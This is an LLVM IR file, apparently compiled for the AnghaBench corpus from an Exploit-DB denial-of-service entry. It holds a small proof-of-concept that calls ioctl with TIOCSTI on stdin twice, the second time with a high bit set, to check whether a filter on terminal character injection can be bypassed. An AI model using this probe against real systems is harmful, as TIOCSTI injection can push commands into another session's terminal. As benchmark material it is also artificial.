; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_46594.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_46594.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@TIOCSTI = common dso_local global i64 0, align 8
@.str = private unnamed_addr constant [25 x i8] c"normal TIOCSTI: %d (%m)\0A\00", align 1
@.str.1 = private unnamed_addr constant [31 x i8] c"high-bit-set TIOCSTI: %d (%m)\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i8, align 1
  store i8 35, i8* %2, align 1
  %3 = load i64, i64* @TIOCSTI, align 8
  %4 = call i32 @ioctl64(i32 0, i64 %3, i8* %2)
  store i32 %4, i32* %1, align 4
  %5 = load i32, i32* %1, align 4
  %6 = call i32 @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str, i64 0, i64 0), i32 %5)
  %7 = load i64, i64* @TIOCSTI, align 8
  %8 = or i64 %7, 4294967296
  %9 = call i32 @ioctl64(i32 0, i64 %8, i8* %2)
  store i32 %9, i32* %1, align 4
  %10 = load i32, i32* %1, align 4
  %11 = call i32 @printf(i8* getelementptr inbounds ([31 x i8], [31 x i8]* @.str.1, i64 0, i64 0), i32 %10)
  ret i32 0
}

declare dso_local i32 @ioctl64(i32, i64, i8*) #1

declare dso_local i32 @printf(i8*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
